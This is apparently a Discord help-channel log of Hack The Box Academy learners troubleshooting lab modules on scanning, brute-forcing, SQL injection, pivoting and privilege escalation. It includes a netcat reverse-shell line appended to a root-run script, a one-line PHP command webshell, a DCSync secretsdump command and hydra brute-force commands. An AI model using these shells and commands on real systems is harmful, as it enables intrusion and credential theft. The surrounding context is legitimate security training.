#modules
crime can you help me please, I can't talk in general chat, I don't know why
can you help me, I can't talk in general chat
ookk
I can't, I don't know why
It literally tells you what to do in #welcome: #welcome message
do I need to have an HTB account to access general chat
ok, thank you
I see it. Cracking into HTB is the path (a collection of modules) then the module / section is Getting Started > Service Scanning:
In this lab a simple "nmap -sV $RHOST" should net you results so it's likely a technical issue. Restart the lab and your VPN is my only suggestion.
Did you install the requirements?
yes
Also /api isn't the endpoint
The web fuzzer fuzzes for endpoints
So drop the /api at the end, that's likely causing issues
Oh nvm I see you tried that
I did bro... I tried everything
It looks like the error as well is more in your python environment than it is with the tool
can I DM you for this problem? or we can talk here?
I genuinely didn't have any issues running it (my python env is 3.11)
same.. my system is up to date
¯_(ツ)_/¯
Let me try again... with some changes
Try doing it in the pwnbox see if the issue persists
I have a problem SSHing in a module
/module/115/section/1105
it says no route to host. I tried resetting the machine
What's the actual module and section name
shells and payloads / bind shells
No route to host generally means you don't have the VPN running
Are you running it in the vm?
yes
I always had, first time that something is not working
can't even nmap it, so yeah might be something from the VPN, let me get a new conf
yeah, works now, thanks
hi, I have a problem, who can help me
secretsdump.py -outputfile inlanefreighthashes -just-dc-user syncron INLANEFREIGHT/adunn@172.16.5.5 it does not work
DCSync AD
I try to connect to the server with the command:
mysql -u robin -probin -h 10.129.19.20
but I got no connection because of this:
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
What can I do? I tried to google it but I can't find any solution.
Sorry, I am in MySQL Footprint
did you specify the port?
I'm not seeing your port specified here.
may be inconsequential but definitely do a sanity check
Works for me in pwnbox. I don't know why your client is validating the cert, that's not enabled by default at least in kali / pwnbox.
You could manpage mysql client to see if there's a flag to ignore SSL.
thanks, I will try this
who can help me
I try to do evil-winrm over proxychains with PTH. I have the right hash and creds, and I have configured an SSH tunnel beforehand. However I keep getting denied, any idea why
I'm really at a loss with the firewall evasion - hard lab in the nmap module. I've followed the examples (apparently that's the solution) and yet it just doesn't work.
||The target port is shown open when nmapping with source port 53, and yet ncat shows "connection refused" using that same source port.||
I don't get it.
It sounds like you should have the solution. Do you want to share the command you're using?
Nevermind. I forgot to use sudo with ncat 🤦♀️
And I was on it for hours. I've just realized that the error message I got was not from the target, but from my VM.
Hi @jaunty mortar, I have the same issue... did you receive some help? I've been stuck for 2 weeks... I bypass the filter via object and base64 but can trigger admin content. Can you help me?
Looking for help on the Web service & API attacks skills assessment. I have got the properly formatted XML document, and sent it to Burp via the python automate script. In Repeater I got it to return in the SQLi payload with a user with the password, I tried submitting the payload with admin and the password, but am not getting anything. Am I missing something, or do I need to submit a different payload that will spit out the flag?
Anyone able to point me in the right direction in how I can edit this YARA rule?
From https://academy.hackthebox.com/module/234/section/2514
I just started doing Sherlocks, and wanted to play around with Splunk for unit42. For some reason I can't import the event logs. Anyone had this issue before? Running Linux for the sake of learning that while doing Sherlocks, so I wanna avoid using the Windows Event Viewer
nevermind, solved
Think I used this https://github.com/whikernel/evtx2splunk
For most Sherlocks you want a Windows VM tho
https://academy.hackthebox.com/module/116/section/1169
Hey guys, I'm getting the same error.
can someone please help me with a hint -
Password:
mssql: login error: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
this is not a question about the answer, it's a question about names
https://academy.hackthebox.com/module/57/section/516
the LAST question
skills assessment.
||
it had been talking about harry potter the WHOLE time but the name they use is harry.potter not harry potter
it says from the question before but that was not the name from there either. that one again was harry potter. ||
HOW am I supposed to know this? per name it said something like it would take 98 HOURS to do. the VM only stays up 90 min lol
where, why and how did the dot get there?
somebody get back to me, maybe I missed this. without a walkthrough it would have taken weeks to months, if ever, to find this.
it does say "Also, try using the 'username-anarchy' tool to generate potential usernames for the employee" but that gives me a few hundred, I legit don't have the time for that
I'm not at that module yet so this seems like a spoiler even if you changed the name... but are you following the CPTS path? Isn't there some way you can automate the validation of a list of users?
CBBH, no it talks about it
I'm more asking if it has to be listed or if I missed it.
when I said I don't have time I meant it tho, like there is not enough time to do 100's of names
You would use username-anarchy to create a plausible list of login IDs from just names (e.g. harry potter = hpotter, potterh, harry.potter, etc.) then you would have a narrow list of guesses for further attacks rather than a gigantic, generic list of usernames.
I can see the confusion if they haven't covered any other means of validating user lists / attacking passwords yet.
It is the skills assessment though. What if you just ran the name list & a password dictionary through an automated login tool? It might be hundreds of combinations, but AFAIK that's the way it's done.
Again, I'm not there yet so you might be onto something. I'm just talking from my current POV.
ya but you have to test each one so the time needed is like months
You'll have to wait for someone else to speak up. I can't say you're wrong, but I suspect there's got to be a way of automating the process.
well, making the list and testing each name, I understand the concept, just not how I'm supposed to finish in 90 min XD. I also get the password part, even thinned down the list per their instructions it would still take months. the only way I got it done was the walkthrough to get the name, then just did the assignment as I kept running out of time.
per name, even on the smaller list, is something like 1 hour to 8 hours, I forgot now but it's looong.
how are you testing usernames
It really wouldn't take long to get it...
1 by 1
my pc disagrees with you
You don't have to "test each username"
Module - Advanced NTLM Relay Attacks Targeting AD CS
Curious what you guys are doing to get around this error? I've run into it several times and have always been able to use passthecert.py to get around it, wondering what other ways there are? I also tried what HTB suggested with npupdate
Hydra has a switch that says to loop through usernames instead of passwords
I forget the skills assessment but you should be able to determine the right one pretty quickly
It doesn't take long for it to find the right password and username
I must be dumb then, as I do not understand how to narrow the name list down. I understand how to do the pw list, just not the name list
This is the last assessment yeah?
in the prev section it just gives you the name, the one after you get part of a name through Burp
yes, it's the last
The username list can be looped through instead of password list, -u
Takes significantly less time
can I pm you to avoid spoilers for others?
No 🗿
okay dokay, sorry to bother you
But fr you just throw the name at username-anarchy
Also: expected time != actual time
The expected time is the theoretical time to go through both lists
It doesn't magically know your user/pass
It's saying: "if we go through the whole list, it will take that long"
but fr I get 100's of names. again this is the issue I didn't get, so it has to do each name + pw, so I'm looking into this -u you are talking about
It's discussed in the module lol
All it does is loop through the username list instead of password list
So it goes username{1..X}:password1
Instead of
username1:password{1..200}
Hello
I need some help with https://academy.hackthebox.com/module/216/section/2300
Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer.
must have missed it. I understand how to generate it, and run vs with the pw, but I guess I'm missing something.
In multiple places in the module it tells you
Your post contained the answer to the previous question @rustic sage, that's why it was deleted
It doesn't work
It's not an answer
Plus
Read it carefully
Enter the time of the identified event in the format HH:MM:SS as your answer. --This is what the answer is supposed to be
Can I please have help without my stuff being deleted? Please? I just want some help
It contained the answer to the previous question :)
Anyway you'll need an AND query
The t..exe
It was in what you posted
💀
I also don't believe you need to narrow it down to a specific log type
Yep
I'm doing the BBH -> SQLMAP -> SQLMAP on HTTP REQs module
https://academy.hackthebox.com/module/58/section/517
and the lab has 11 cases to complete, only 4 are flagged. the others, the 5th I'm currently on, is requesting us to exploit an OR injection with a GET request, and I'm having trouble getting sqlmap to do this... it seems to start out with an AND and go no further... plugins were not discussed in the module.
So you're on case#4?
case #5
#5, only say that to say I'm actually trying to learn this stuff so I'm doing all the cases regardless of whether a flag is required.
@fathom pendant Thank you for trying to help! I really appreciate it. I'm glad you caught on to my posting of one of the answers, I wouldn't have caught it, so thank you! I figured it out. I just constructed an XML query to find the .dll file. I used ChatGPT to construct it 🙂
? #5 isn't on this page, I'm referring to the case in parenthesis
let me double check my link right quick. it's on the target's web server
oh I see what you're saying, yeah it's not a flag, it's on a list of 11 cases on the target webserver, only 3-4 of them are flags. I'm actually trying to learn this so I want to complete them all
Module: Linux privilege escalation
Section: Docker
I have a problem with solving this module. I don't really understand even how to start with this thing. I'm assuming I should run this docker instance on the host target, but how do I find the docker image file? Besides that I was only able to run
docker -H unix:///run/docker.sock ps
command instead of
docker -H unix:///app/docker.sock ps
because it prompted me about docker not being active
#5 is on the attack tuning session
is that gonna be the next section?
The docker instance is already running
2 sections, there's a reading one in between
does HTB academy now only accept credit card for payment?
okay so what's the reason it "doesn't" work
I thought it'll list available docker instances
Hold on
docker image ls
oh
thanks for that. is the command difference caused by another distro or something?
I thought something was wrong when it showed no instances
Look at the exact things; it's showing the command running on a port
It's not showing the containers that are running
okay thanks!
Hey guys is there a ticket system to report a bug/issue?
Depends; if it's a module issue -- #1234357888114364508 if it's a site issue message support
I have tried looking above but couldn't see too much when I searched. I am on the Information Gathering - DNS Zone Transfers section. How much am I allowed to disclose? I am stuck on the first question. I run dig against inlanefreight.htb (added to my /etc/hosts file) and I only get one DNS back. I went to the zonetransfer.me site just to get some more guidance. Other than watching some DNS Zone Transfer content to understand it, is there anything else I can do? I have attached my initial try
You're misunderstanding what's being asked to do
ok no worries, I will try finding some more education pieces and try again
Zonetransfer.me is a website to demonstrate zone transfers with, it's not actually something you need to query for this. It was being used in the section for demonstration purposes only
The dig syntax is
dig axfr domain @ip/nameserver
Gotcha thanks
Think I need to do some more education on it.. at least I know what I was doing was wrong
Just gotta separate example from what you need to do
yeah when I read the digi ninja site it literally says to use as an example. Ok, thanks anyway. I will park it for the moment. I'll get more familiar before I ask again
Hey, I'm doing the attacking WordPress section, the question is to find another user present against blog.inlanefreight.local. I read /etc/passwd to find any user, leveraging a command execution vulnerability from a plugin, but I can't seem to find the user. any tips
ok so part of my problem was anarchy didn't generate names but said it did. was giving me empty files (this explains A LOT)
still does not help speed this up
[DATA] attacking ssh://iphere:porthere/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 3340 to do in 00:42h, 10 active
[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active
but guess I will give it like 20 min, see what happens
Oh that's weird but glad you resolved that bit
I never thought to check names, I won't lie, I was checking the pw list and it was doing that
but names were blank files

I removed it, replaced it and now it works fine, no idea why or how it broke tho
I double checked and I was doing -u. I was confused about the looping part you were talking about as I was doing that, but I mean I see now why it didn't work
Is it bad I could recognize it as Dell from the back panel alone? 
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active
this is min not hours right?
welp, back in 30 min or so 🤓 see if it worked or not, otherwise I'm still in the "how do I have time for this" area
I think it's displayed as HH:MMh
https://academy.hackthebox.com/module/112/section/1069 I am working on this module - Footprinting -> DNS -> What is the FQDN of the host where the last octet ends with "x.x.x.203"?
For some reason, I can't seem to get the answer. I've tried ||inlanefreight.htb & internal.inlanefreight.htb||
What am I missing?
||dnsenum --dnsserver 10.129.121.184 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
dnsenum VERSION:1.2.6
----- internal.inlanefreight.htb -----
Host's addresses:
Name Servers:
internal.inlanefreight.htb NS record query failed: REFUSED||
As you see it said it did work in 00:07h (7 minutes)
75 min on the box, 45 min to pw (I'm guessing)
ya just double checking
Use a different subdomain
Likely less
it's an old Alienware, it's all I got for a hackbox so the video card is utter trash, don't judge me
Dude
I'm running on an i5 7500U, with a 1050ti gfx card
Also the video card wouldn't matter for this
As you're not cracking a hash
You're bruteforcing a password
Any help?
Is it another WordPress user? If so, it won't be under /etc/passwd
iirc wp-users is where users may be
it's an i7 but the video card is like a Radeon HD 6790/6850 that I replaced the 750/780 or whatever it was with when it popped (like actually went POP)
Got it, used wp scan itself
i live in this state of being welcome
[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active
[STATUS] 64.00 tries/min, 960 tries in 00:15h, 2460 to do in 00:39h, 10 active
[STATUS] 62.81 tries/min, 1947 tries in 00:31h, 1473 to do in 00:24h, 10 active
[STATUS] 62.75 tries/min, 2259 tries in 00:36h, 1161 to do in 00:19h, 10 active
[STATUS] 62.39 tries/min, 2558 tries in 00:41h, 862 to do in 00:14h, 10 active
[STATUS] 62.24 tries/min, 2863 tries in 00:46h, 557 to do in 00:09h, 10 active
[STATUS] 62.35 tries/min, 3180 tries in 00:51h, 240 to do in 00:04h, 10 active
1 of 1 target completed, 0 valid password found
I know I'm doing this right and I know the name and pw are in there, so I'm missing something, but I'm done for today / rn.
question
for the password portion
did you allow it to l33t?
and add characters?
yes, I already know the name / pw and checked and it's in there
i hope that's a typo
rofl
-l is username whereas -L is the list
so you were literally passing 'username.txt' as the user
the hell is a macherino
that's a 30 min typo error yup.. ya got me
I even have -L in my notes and put -l, I'm special
Welcome
Hey, I got a shell into the domain in the attacking WordPress section and I have command execution. I got the uid command, after that I typed in many commands to find the flag, none seem to work, most return me nothing
find / -name "*flag*.txt" 2> /dev/null
wow that took 10 seconds, I'm gonna go kick myself ☠️ when the file was empty I used -L, when the file was not empty I used -l
yeesh break time ty all
O7
At least you were willing to go back and check yourself on it
Instead of claiming "lab broken" 
Still nothing
What's the exact wording of the question
Following the steps in section obtain code execution on host and submit contents of the flag.txt file on webroot
on the webroot
you are in the wrong folder XD
There's your keyword there
I did ls /var/www/flag.txt
Generally webroot is /var/www/html
And many such command but it returns me
idk, mine might be broken lol jk, but seriously the target win box keeps kicking me out, connection ain't stable I guess
Hdkdjsjsj-1384949.php
Did you check /var/www in general?
when you do the command of marcie, don't forget to replace the space with +
find+/+-name+"flag.txt"+2>/dev/null
Is this the common services module?
Now everything works
Darn forgot that +
Yeah lol
Got the flag section done after 20 minutes of missing a +
I understand the frustration, but I never forget it anymore when I do a remote code execution on web
I was very happy I got the shell in and cmd execution possible when I got uid
Either + or %20
I thought this was done then LOL TOOK ME 20 MINUTES MORE
URL encoding is great
it's true, I'm not used to it yet, but I have to be, because it's always there the %20
hey @fathom pendant,
I'm still working that SQLMap module -> Attack tuning section (I just LOVE SQL)...
https://academy.hackthebox.com/module/58/section/526
case #6... I already solved the prefix portion (manually). do you know if we were supposed to use risk/level to acquire the prefix?
if I understand it correctly, it's supposed to fuzz SQL vector boundaries, but god it was taking so long... then in the solution it sorta acts like you're just supposed to know it before starting the sqlmap scan (along with utilizing the prefix)
yes you're meant to use the risk stuff
but the prefix stuff is just found in the reading
I'm sure there's some cheatsheet out there with common prefixes
the solution shows them utilizing the prefix stuff prior to the scan tho? maybe that's just a small content oversight?
like as though you're supposed to manually find it? dunno
yes it is, but it just sorta "appears" without explanation in the solution. I guess one can make a leap in logic, just want to be sure I'm approaching it how "it" wants
¯_(ツ)_/¯
you just keep pivoting until the end
the last 2 questions are solved by the same machine
then dig for another set of creds
¯_(ツ)_/¯
each hop has unique creds
it says to find shadow.bak but there is no such shadow.bak in that directory
are you SSHed to the target?
I am using the VM instance
it is vf
do I still need to SSH?
yes but there should be a target you need to ssh into
oh
<click here to spawn target>
got it
Is HTB openvpn academy 5 server down? I cannot connect to the VPN.
@fathom pendant Thank you!
I have an error message from hydra, "all children were disabled"
Anyone help me
I am stuck in Attacking Common Services
generally means you were sending too many threads
and the port stopped responding
How can I solve that?
Without -t 64 ?
If it's the mail services section that's wayyyyy too many
What I should do
Wdym "not working"
The hydra itself
That doesn't help at all
Yeah I am using port 25
Yes and when bruteforcing for pw you don't include the @domain
From what I recall
I include it
no
what i'm saying is you don't use @domain in your hydra command
so -l user without the @domain
I used that with the domain 👍🏻
if you're attacking smtp, you do need to include the @ domain
This is my command: hydra -l fi****@inlanefreight.htb -P'/usr/share/wordlists/rockyou.txt.gz' -f 10.129.****smtp
But not working as I told you
wait
I guess you should extract the wordlist
is this the email section or the skill assessment
if it's the skill assessment then you DON'T use the @domain
Why ?
I was thinking you were on the Email section, since you didn't specify what you were doing
It is the same
also go for imap://
instead
or another protocol
smtp may not have authentication enabled on this server
@reef pecan the spider takes a long time and eventually finds it
please refrain from posting spoilers as well; from my understanding to make it faster -- you should first identify pages that may have input and spider/target those
instead of the website as a whole
which can take up to 30+ minutes
I see, it keeps running. I thought it had already finished.
Thanks
yeah
hi guys, when I try to go to that address "files/shell.aspx" it doesn't work
and I can't remember how I did it previously, but I don't think I understood it, which is why I'm asking for clarification
okay let me try
instead of single
ok hold on
this comes up again
oh wait
I don't think I edited the file itself
😂
I don't seem to have the Antak webshell, where can I download it from?
Have you tried googling?
Document your process as soon as possible. I use NotesNook, very convenient to have the previous procedures documented for when I come across the same problem again.
yes, thanks guys, found it
thank you, I am taking notes in my Obsidian
Can you tell me as to why this command is not working?
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
I'm getting:
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
rm: cannot remove '/tmp/f': No such file or directory
I'm doing nibbles
Getting Started - Nibbles - Privilege Escalation
do you get something in your listener when you run it though?
:)
also make sure you replace 10.10.14.2 with your tun0 IP
Yeah that's what I did
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.156] from (UNKNOWN) [10.129.193.185] 58584
oh ok
basically though it's making sure if /tmp/f does exist, you're deleting it -- then making a pipe to it
specifically a first in first out [fifo] pipe
I need to modify the Antak shell with a username and password but HTB doesn't provide it
Thanks for clarifying.
you don't
just make sure your ip and port are in it
where applicable
the default creds are in the file
also, why do we switch web shells? like why am I using the Antak webshell instead of Laudanum
okay, I'll check
to showcase other shells
can someone please help me with this question and steer me in the correct direction
if you haven't found the default creds, it's on line 12
Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: ****\****, 1 space)
thanks I did
if your answer is wrong then you uploaded to the wrong vhost :) 
(yes there IS a difference)
good thing you didn't lose more sanity over it
😂
[Help information gathering - web edition - Skill assessment]
Hello everyone, I'm having a hard time finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browser, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?
Did you add a / at the end?
yes 😦
I'm receiving "The connection was reset", but i'm pinging it normally, and my network is 100%
And you specified the port?
yess
🤣 🤣 🤣 🤣
Sometimes (for some reason) the browser drops the specified port
Marcielee, I just realized I was the dumb one
Ohno

It do be like that
thank you anyway, I wouldn't have noticed it kkkkk
I'm losing my sanity
Hey guys, I'm on the Footprinting module IMAP/POP3 section, does someone know how I can see the content of an email when I'm in the IMAP server,
ain't we all
https://tewarid.github.io/2011/05/10/access-imap-server-from-the-command-line-using-openssl.html
and
Access IMAP server from the command line using OpenSSL
life hacks for pop3 and imaps
a FETCH 1 (BODY[TEXT]) Fetches only the body text of the first email.
I use GPT sometimes to find out about commands and put it in my notes
Don't include the [TEXT] just the []
Body[]
Fetches all the email info fields
There is also in fact only 1 email
If you want to fetch all emails (if more) you could do a fetch * body[]
But the thing is, when I execute my command it disconnects me @placid edge
do I need to include the SELECT and the FETCH in one command?
hi, good afternoon to everyone.
I am trying to solve the following question:
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
I saw that there is a forum regarding this, but I still don't understand the logic of it.
in the question they are referring to "unique paths of domain" but I am not sure what this means.
I get that we need to extract the HTML info of the page and filter, but what needs to be filtered is what I don't get
oh ok, didn't know about that
I think I am missing some context of the website stuff that I dont know.
a FETCH 1 FULL, I used this as well
This is the only bullshit question, I'd go through the forums to answer
@fathom pendant why do you say it's bullshit? is it out of the course level?
if it's POP3 you can just use retr (index) ex: retr 1
so how can I select the mailbox before fetching? when I do it I have to select a box but I can't do it in one command
show your command as well not just the output
||This is my command curl -k 'imaps://10.129.161.217' --user robin:robin -v -X 'SELECT DEV.DEPARTMENT.INT'||
lol
a select [mailbox name]
Yeah telnet is gonna be way better for this
f
when I try to execute commands on the reverse shell it doesn't work
anyone have any ideas?
That's not a reverse shell btw
It's a webshell
dir
gave me same problem
what should I do?
@tender nimbus careful with posting flags dude
that's why I put a spoiler, my bad ^^
here without it
You don't need to wrap it in () btw
btw can I ask why your rank is noob on HTB? 😅
But the body without the square bracket just gives basic info about the message
I don't do boxes
ahh ok
may I ask why not, and if you don't do them how do you know so much
I just don't
ahh ok
okej so by doing body[1] I select the first message in the inbox?
I read and a good portion of my knowledge comes from either modules or others
ohh ok makes sense
Yes. If you didn't specify
You can do
a fetch 1 body[] and it'll do the same
It's not windows
okej but imagine if I have more messages in this inbox?
Looks like the webshell module thingy.
then I need to specify, so if I want to see the body of the third message I need to do BODY[3]
now the website isn't loading 😦
yea, PHP web shells
Or 3 body[]
ow okej thanks ^^
As there's more stuff you can actually specify in the brackets
Test if it works with whoami
As it's a universal command compared to ls and id
I tried the "sudo -l" as shown in the images on HTB, it gave the same network error. I will try that as soon as it loads again
It's a connection issue
Ah alr. I'm working off memory here so I might be wrong, but I believe the backend is Windows and not Linux
It is linux
is this the webshell you are using https://github.com/WhiteWinterWolf/wwwolf-php-webshell ?
It drops you into a .../www/.../ directory
Ah alr
yeaa
Coolio.
Ye I checked the module first to be sure
Anyways, I feel like you didn't even open the posts that I sent
try to rename it like connectx.php and upload again. then try to access. (worked fine for me before)
Nor mine
TCP is very slow... since I changed VPN servers it's not working properly
okay thanks, I'll try
of course I did haha, that helped me to find out the answers ^^
just asking a question bcs it's not the same in the module
Protip. If you want help you should include your command and output. We can't do shit with only the output
Eh, it's reading an email in POP3. Same thing
ik, but some people are removing it bcs my commands can help to find the answer..
Footprinting lab hard is it safe to say from the description the user is HTB?
Just redact passwords and spoilers
User should be included or found prior in the course most times
If you need a user or its not a part of the challenge
last question: why can't I login here with telnet? how can I bypass the error message?
Hmmm
I'm stuck lol
Right port?
or is it here needed to do it on port 993
Looks like that's an IMAP port
yes it is
but I can't connect with the same credentials as on the secure port 993, but why is that?
hello
Yo
You are hackers
Instead of a webshell you could just upload a php system webshell and see if that works.
<?php system($_GET['cmd']); ?>
so upload this in a file?
Ye like test.php
okay, let me try that
And include ?cmd=whoami in the url parameter when you open the file
yeah I know, but that's my question: why can I connect on IMAPS port 993 with the credentials abc:abc but not on IMAP port 143 with abc:abc? I receive this error when I do it
okay let me try
It says that ssl is required
This
Use openssl
okej I understand that, so if it's the case what can you do on the server?
I did, I was just trying to understand why it was not working there
Because it requires ssl/tls
is it possible that sometimes there are services where we have access to but where we can't have interaction with?
You aren't allowed to use IMAP
okej so in this case, if it was a real case, the IMAP server was useless?
No. Depends on their security config
I mean running password over telnet over http is terrible
Or in this case imap
Okej, I'm not that far yet to understand everything, but thanks for your help guys 🙂
thanks, I got it
I appreciate your help bro
now I'm off to play some EA FC 24
Sweet, prob an issue with the webshell or a cleanup script
yeaa
Np
if anyone plays on ps5 lmk and dm
Can i DM someone about this module
https://academy.hackthebox.com/module/136/section/1310
Skills Assessment - File Upload Attacks
I finished it after getting a hint I just have some questions
nevermind I am an idiot
I'm trying to finish the Skills Assessment part 1 of the "Active Directory Enumeration & Attacks" module, however I'm currently stuck while trying to upload a tool to my victim asset.
I have setup proxychains to access the victim asset with psremote. From there I want to wget the file from my attacker machine.
I tried with evil-winrm however I don't know why I just can't connect to the machine (the port is open though...)
im so tempted to see solution
do u have a port forward going to ur http server?
I need to set it up where? I only set up the proxychains conf and launched chisel on the webserver that I had access to. Then I psremote to the victim asset for which I had an account that could log in there
Port Forward ip and then connect with evilwinrm or xfreerdp. Evilwinrm you can just use the upload command, xfreerdp you can link a local drive
thats what i was thinking but i think he said the upload isnt working
I see
Upload chisel or another method to the attack host then upload it that way then you can port forward to your local machine
i dont use chisel but using netsh should work fine
Yeah I prefer chisel but any of the methods will work
Anyway I found another way to upload my file. I didn't know, but with psexec.py you can upload a file. So I did it. Still, I don't understand why I can't evil-winrm into the host...
ligolo is the best
Thanks I will look at it
ontop
If you share screenshots/errors we might be able to help
proxychains4 evil-winrm -i IP -u USER.
I get this. I found that it may be due to the port being closed but from my nmap and netstat I found it to be open so I don't know
it seems like you put in the wrong credentials
I don't think so. The creds are valid for sure. And I tried several times with a copy and paste. I will try again
try putting them inside double quotes
Does xfreerdp work?
I didn't try xfreerdp and the lab is over now I didn't see the timeout xD. I will need to setup everything again
the user you are trying to connect as probably doesn't have the privileges to connect via winrm
I need to check again, I probably made a mistake while doing my enumeration then
Hello guys, please, I can't connect to the windows server via rdp. Module:
Password Attacks:Pass the Ticket (PtT) from Windows
** Attacking Common Services -> Attacking FTP **
Despite covering all bases with ||nmap -T4 -Pn -p- --disable-arp-ping -sCV <IP>|| there literally is nothing there as far as FTP is concerned. What am I missing?
Is --max-retries=0 a problem?
The only services on the box are SSH, DNS, NetBIOS, and SMB. FTP is nowhere to be found.
Nope. 22, 53, 139, 445 and nothing else.
try restarting it
rdp is super finicky. increase the timeout, try it a few times, or reset the target
there are other ports ftp can run on
done that already
i will try this
Yes, I'm aware of that which is why I ran it with -p-
Found it after resetting though
its on a kinda known port
normal nmap will find it
sometimes you can also try adjusting -T parameter too
i think i guessed that answer too 😂
how can i paste a screenshot here
ok
this
timeout isn't a binary to connect to RDP afaik
ahh i see. try xfreerdp with /timeout:100000
also are you sure you're supposed to RDP into it?
does that even fix it
straight up unable to connect
nah it's the timeout for the session, not for the connection
i reviewed the section i don't even see where they tell you to RDP in
unless it's just to the initial target
ptt from windows? looks like you do need to rdp in
verify correct vpn connection, maybe try xfreerdp or remmina
Someone give me hint on footprinting hard I'm already in ssh trying to find the htb user now
Hello guys! Bringing your attention to this again.
I tried possible combinations with -
servername\username, etc. none worked
the error is right there in the error message, it doesn't recognize that user as a domain user. maybe there's another way to authenticate that isn't against the domain.
like a local DB user?
oh maybe not for that login now that i look at it
well it still says domain user maybe try local
it will use Windows Authentication. If we are targeting a local account, we can use SERVERNAME\\accountname or .\\accountname.
well I tried again now with the exact command, it worked. How?
PIVOTING, TUNNELING, AND PORT FORWARDING/SOCKS5 Tunneling with Chisel. Is this another issue with using pwnbox?? ubuntu@WEB01:~$ ls
chisel
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
not really sure how i can move forward from here, i'm guessing i need a different version of chisel that is compatible with the pivot host?
yup exactly
but how do i know which one to download?
pivot host is running OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
could you give me a link?
would this be a good candidate? chisel_1.10.0_linux_386.deb
just go to their releases on github
that's 1.10.0... like it says in the file name. cmon bruh.
i really don't mean to be asking dumb questions, but also I def have a gaping knowledge hole for downloading stuff on my own, like right now i followed the chisel git link they provided, navigated to what i think is different versions, but there are like 85 different links and they all start with chisel_1.10.0 and at the top there is a green tag that says "latest"
yeah, those are the installers/executables for various operating systems. you need to go to releases and find 1.7.6
are you on the pwnbox?
yes, on the pwnbox
idk then, it probably works but i used kali. https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz
i found the releases section at least, that was my problem, i will try the link you provided
it'll be important to know where to get downloads on github, how to compile stuff yourself, and how to download stuff from there. many PoC's use github
ya it's definitely something i need more practice with, i usually just cross my fingers that the links work that htb provides
so do i not need to go build with that link? ls
cacert.der Desktop Downloads Music Public Videos
chisel_1.7.4_linux_amd64 Documents go Pictures Templates
nope
interesting, sometimes (most times) i don't even know what i don't know
so when i use that link and others, it downloads what looks to be a singular file that i need to gunzip, but with the provided htb link it downloaded a package with a bunch of different things. I tried it anyway and got this: ubuntu@WEB01:~$ ls
chisel_1.7.4_linux_amd64
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
-bash: ./chisel: No such file or directory
what does the error say
bash: ./chisel: No such file or directory ??
so you just unzipped a file right.. maybe type ls to see the file name
ubuntu@WEB01:~$ ls
chisel_1.7.4_linux_amd64
when you use ./ it calls to the directory you're in, do you see a "chisel" file name?
what i'm saying is it downloaded that single file, instead of a package
chisel_1.7.4_linux_amd64 is the file name
is it a folder or file name
file
so instead of ./chisel, what do you think you should put?
./chisel_1.7.4_linux_amd64
You might need to chmod +x chisel_1.7.4_linux_amd64
omg
nah
command not found
./ligolo xD
sudo ./chisel_1.7.4_linux_amd64 server -v -p 1234 --socks5
[sudo] password for ubuntu:
sudo: ./chisel_1.7.4_linux_amd64: command not found
make sure it's not a folder and chmod +x like gubarz said
protip: tab autocompletes, so you can just start typing ./ch and hit tab
file chisel_1.7.4_linux_amd64
i got it listening! chmod +x was the trick, along with everything else, thanks @cloud urchin
and @shut quest
got the flag ❤️
I am a bit confused by the Shared Object Hijacking in linux priv esc. Like if I run the binary it automatically drops me to root....requiring me to do nothing. Also the .so library is not even writable; in the module the author shows how to exploit by overwriting it. What's going on?
like what's the whole point of the question/exercise if it just works with no intervention?
Your answer is in the section question.
...recreate all examples (don't just run the payroll binary). Practice using ldd and readelf.
And if that doesn't do it for you, practice. Time on the keyboard. It's to get you through the motions of how to perform that kind of exploit.
Bro, the module itself does not even correlate with the environment in the lab. Practice what ? In the module he overwrites the shared library, but in the environment we do not have write permission on it
look
practice what? the library is not even writable like they show it. What example to recreate?
I was having issues with crackmapexec so tried netexec and it was complaining about missing impacket modules. I had to manually install the relevant python files in /home/kali/.local/lib/python3.11/site-packages/impacket copied from https://github.com/fortra/impacket/tree/master/impacket
Most of the files were installed by pip but not all
BRUH, it's about learning how to detect so's, they created the exploit for you.
yeah, the directory is definitely writable
yeah, but now I have to create my own payroll binary and set RUNPATH during gcc compilation, then try to exploit it?
honestly there is barely one paragraph of explanation for this section, hacktricks shows it in more detail and actually explains it, very disappointed with the linux lpe module overall
i really liked the hijacking parts
the concept is interesting, the way the author explains in this section is bad, whole section has less than 50 words I think
actually you cannot even recreate the example in the module
why this is not working i am using pwnbox
